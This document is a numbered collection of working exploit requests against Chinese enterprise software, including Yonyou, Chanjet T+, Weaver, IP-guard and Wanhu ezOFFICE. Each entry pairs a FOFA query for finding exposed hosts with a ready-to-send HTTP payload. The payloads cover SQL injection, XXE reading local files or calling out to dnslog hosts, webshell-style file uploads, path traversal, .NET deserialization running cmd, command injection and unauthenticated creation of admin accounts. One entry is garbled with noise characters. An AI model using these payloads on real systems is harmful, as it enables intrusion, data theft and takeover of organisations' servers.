Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Connection: close

------WebKitFormBoundaryH970hbttBhoCyj9V
Content-Disposition: form-data; name="Filedata"; filename="1.jpg"
Content-Type: image/jpeg

------WebKitFormBoundaryH970hbttBhoCyj9V--

31. Yonyou NC runStateServlet SQL injection
version<=6.5
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded

32. Yonyou NC complainbilldetail SQL injection
version: NC633, NC65
FOFA:app="用友-UFIDA-NC"
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

33. Yonyou NC downTax/download SQL injection
version: NC6.5
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

34. Yonyou NC warningDetailInfo endpoint SQL injection
FOFA:app="用友-UFIDA-NC"
GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

35. Yonyou NC-Cloud importhttpscer arbitrary file upload
FOFA:app="用友-NC-Cloud"
POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
Host: 203.25.218.166:8888
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
Content-Length: 190
Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0

--fd28cb44e829ed1c197ec3bc71748df0
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"

<%out.println(1111*1111);%>
--fd28cb44e829ed1c197ec3bc71748df0--

36. Yonyou NC-Cloud soapFormat XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/soapFormat.ajax HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Content-Length: 263
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1

msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a

37. Yonyou NC-Cloud IUpdateService XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Content-Length: 421
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: text/xml;charset=UTF-8
SOAPAction: urn:getResult
Upgrade-Insecure-Requests: 1

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
  <soapenv:Header/>
  <soapenv:Body>
    <iup:getResult>
      <!--type: string-->
      <iup:string><![CDATA[
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
<xxx/>]]></iup:string>
    </iup:getResult>
  </soapenv:Body>
</soapenv:Envelope>

38. Yonyou U8 Cloud smartweb2.RPC.d XXE
FOFA:app="用友-U8-Cloud"
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
Host: 192.168.40.131:8088
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
Content-Length: 260
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>

39. Yonyou U8 Cloud RegisterServlet SQL injection
FOFA:title="u8c"
POST /servlet/RegisterServlet HTTP/1.1
Host: 192.168.86.128:8089
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 85
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
X-Forwarded-For: 127.0.0.1
Accept-Encoding: gzip

usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--

40. Yonyou U8-Cloud XChangeServlet XXE
FOFA:app="用友-U8-Cloud"
POST /service/XChangeServlet HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Content-Type: text/xml
Connection: close

<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>

41. Yonyou U8 Cloud MeasureQueryByToolAction SQL injection
FOFA:app="用友-U8-Cloud"
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json
Accept-Encoding: gzip
Connection: close

42. Yonyou GRP-U8 SmartUpload01 file upload
FOFA:app="用友-GRP-U8"
POST /u8qx/SmartUpload01.jsp HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36

PAYLOAD

http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml

43. Yonyou GRP-U8 userInfoWeb SQL injection leading to RCE
FOFA:app="用友-GRP-U8"
POST /services/userInfoWeb HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
SOAPAction:
Content-Type: text/xml;charset=UTF-8

<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
  <soapenv:Header/>
  <soapenv:Body>
    <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
      <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>
    </ser:getUserNameById>
  </soapenv:Body>
</soapenv:Envelope>

44. Yonyou GRP-U8 bx_dj_check.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

45. Yonyou GRP-U8 ufgovbank XXE
FOFA:app="用友-GRP-U8"
POST /ufgovbank HTTP/1.1
Host: 192.168.40.130:222
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Connection: close
Content-Length: 161
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

reqData=<?xml version="1.0"?>
<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest

46. Yonyou GRP-U8 sqcxIndex.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

47. Yonyou GRP A++Cloud government finance cloud arbitrary file read
FOFA:body="/pf/portal/login/css/fonts/style.css"
GET /ma/emp/maEmp/download?fileName=../../../etc/passwd HTTP/1.1
Host: x.x.x.x
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
Connection: close

48. Yonyou U8 CRM swfupload arbitrary file upload
FOFA:title="用友U8CRM"
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855

------269520967239406871642430066855
Content-Disposition: form-data; name="file"; filename="s.php"

1231
Content-Type: application/octet-stream
------269520967239406871642430066855
Content-Disposition: form-data; name="upload"

upload
------269520967239406871642430066855--

49. Yonyou U8 CRM system uploadfile.php endpoint arbitrary file upload
FOFA:body="用友U8CRM"

POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Content-Length: 329
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w

-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="file"; filename="%s.php "
Content-Type: application/octet-stream

wersqqmlumloqa
-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="upload"

upload
-----------------------------vvv3wdayqv3yppdxvn3w--

http://x.x.x.x/tmpfile/updB3CB.tmp.php

50. QDocs Smart School 6.4.1 filterRecords SQL injection
FOFA:body="close closebtnmodal"
POST /course/filterRecords/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 224
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1

51. Yunshikong social commerce ERP system validateLoginName SQL injection
FOFA:app="云时空社会化商业ERP系统"
GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

52. Weaver E-Office json_common.php SQL injection
FOFA:app="泛微-EOffice"
POST /building/json_common.php HTTP/1.1
Host: 192.168.86.128:8097
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Content-Length: 87
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333

53. DPtech VPN Service arbitrary file upload
FOFA:app="DPtech-SSLVPN"
/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

54. Chanjet T+ getstorewarehousebystore remote code execution
FOFA:app="畅捷通-TPlus"
Step 1: send the packet below to the target; it executes a command that writes the specified string into the specified file:
"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"

Full packet:
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
Content-Length: 593

{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName":"Start",
    "ObjectInstance":{
      "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
      "StartInfo":{
        "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "FileName":"cmd",
        "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
      }
    }
  }
}

Step 2: request the following URL
/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt

55. Chanjet T+ getdecallusers information disclosure
FOFA:app="畅捷通-TPlus"
Step 1: obtain a Cookie through the endpoint
/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword
Step 2: using the obtained Cookie, request
/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers

56. Chanjet T+ RRATableController,Ufida.T.DI.UIP.ashx deserialization RCE
FOFA: app="畅捷通-TPlus"
POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Type: application/json

{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName":"Start",
    "ObjectInstance":{
      "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
      "StartInfo": {
        "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"
      }
    }
  }
}

57. Chanjet T+ keyEdit.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

58. Chanjet T+ KeyInfoList.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

59. XETUX software dynamiccontent.properties.xhtml remote code execution
FOFA: title="@XETUX" && title="XPOS" && body="BackEnd"
POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
Host: 192.168.86.128:9090
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Content-Length: 1669
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

PAYLOAD

60. 百卓Smart管理平台 importexport.php SQL注入
6 W9 s/ W/ U: u3 Y# RFOFA:title="Smart管理平台"* b; X0 y ?* u1 c& }$ D# I8 P
GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1 i& m, D3 O" Y. J
Host:& t' ]" F E3 C. ]# i
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36; g/ L/ V# w0 C, M$ x3 u3 x9 q/ A
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
2 f# n5 O4 p0 y8 kAccept-Encoding: gzip, deflate) H+ f( p6 ]) @( Y/ ]5 ]2 q
Accept-Language: zh-CN,zh;q=0.9
6 {! m' G" Z" w: ^( ^1 @! A3 OConnection: close: Z U% Z( I. l& l8 @9 M
& A. \4 a5 p" L/ f$ X) h c. b) y! l3 Q. Y
61. 浙大恩特 customer resource management system fileupload arbitrary file upload
FOFA: title="欢迎使用浙大恩特客户资源管理系统"
POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 27
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

8uxssX66eqrqtKObcVa0kid98xa

62. IP-guard WebServer remote command execution
FOFA:"IP-guard" && icon_hash="2030860561"
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Then request:
GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x

63. IP-guard WebServer arbitrary file read
IP-guard < 4.82.0609.0
FOFA:icon_hash="2030860561"
POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A

64. 捷诚 management information system CWSFinanceCommon SQL injection
FOFA:body="/Scripts/EnjoyMsg.js"
POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
Host: 192.168.86.128:9001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Connection: close
Content-Length: 369
Accept: */*
Accept-Language: en
Content-Type: text/xml; charset=utf-8
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
  <GetOSpById xmlns="http://tempuri.org/">
    <sId>1';waitfor delay '0:0:5'--+</sId>
  </GetOSpById>
</soap:Body>
</soap:Envelope>

65. 优卡特 脸爱云 一脸通 smart management platform 1.0.55.0.0.1 authorization bypass
FOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"
A 200 response means the account test123456/123456 was created successfully.
POST /SystemMng.ashx HTTP/1.1
Host:
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Accept-Language: en
Content-Length: 174

operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators

66. 万户 ezOFFICE collaborative management platform SendFileCheckTemplateEdit SQL injection
FOFA:app="万户ezOFFICE协同管理平台"

GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

The string 6cfe798ba8e5b85feb50164c59f4bec9 appearing on lines 42 and 43 of the response confirms the vulnerability.

67. 万户 ezOFFICE wpsservlet arbitrary file upload
FOFA:app="万户网络-ezOFFICE"
The newdocId and filename parameters give the name of the file to write, the dir parameter gives the directory it is written to, and the fileType parameter gives the file type.
POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Content-Length: 173
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Connection: close
Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp
DNT: 1
Upgrade-Insecure-Requests: 1

--ufuadpxathqvxfqnuyuqaozvseiueerp
Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"

<% out.print("sasdfghjkj");%>
--ufuadpxathqvxfqnuyuqaozvseiueerp--

The uploaded file is reachable at /defaultroot/platform/portal/layout/apoxkq.jsp

68. 万户 ezOFFICE wf_printnum.jsp SQL injection
FOFA:app="万户ezOFFICE协同管理平台"
GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: {{host}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

69. 万户 ezOFFICE contract_gd.jsp SQL injection
FOFA:app="万户ezOFFICE协同管理平台"
GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

70. 万户 ezEIP success command execution
FOFA:app="万户网络-ezEIP"
POST /member/success.aspx HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=
Content-Type: application/x-www-form-urlencoded
TYPE: C
Content-Length: 16702

__VIEWSTATE=PAYLOAD

71. 邦永 PM2 project management system Global_UserLogin.aspx SQL injection
FOFA:body="PM2项目管理系统BS版增强工具.zip"
GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Connection: close
